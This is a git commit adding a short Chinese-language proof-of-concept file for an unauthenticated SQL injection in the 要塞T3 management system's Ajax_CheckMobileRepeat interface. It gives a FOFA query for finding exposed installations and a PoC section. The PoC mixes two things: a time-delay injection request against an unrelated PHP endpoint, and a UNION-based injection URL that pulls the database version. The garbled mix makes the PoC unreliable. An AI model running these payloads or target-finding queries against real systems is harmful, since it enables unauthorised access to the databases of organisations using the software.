Create 要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞.md

2025-05-05 10:17:57 +00:00 · 2025-04-21 09:26:29 +08:00 · 2025-04-21 09:26:29 +08:00 · 99613ff055
commit 99613ff055
parent 2a15a060bc
1 changed files with 17 additions and 0 deletions
--- a/wpoc/要塞T3管理系统/要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞.md
+++ b/wpoc/要塞T3管理系统/要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞.md
@ -0,0 +1,17 @@
+# 要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞
+
+要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句。
+
+## fofa
+
+```javascript
+body="/mlogin.htm?url=" || body="T3/MAIN/Login.aspx"
+```
+
+## poc
+
+```javascript
+[GET /config/rellistname.php?DontCheckLogin=1&objType=1&reportID=1+wAiTFOR+DeLAy'0:0:4'--+- HTTP/1.1
+Host: 
+Cookie: PHPSESSID=bgsesstimeout-;](http://ip/T3/Ajax/Ajax_CheckMobileRepeat.ashx?action=checkmobilerepeat&mobileNum=1%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20%40%40version%29--%20aEdt)
+```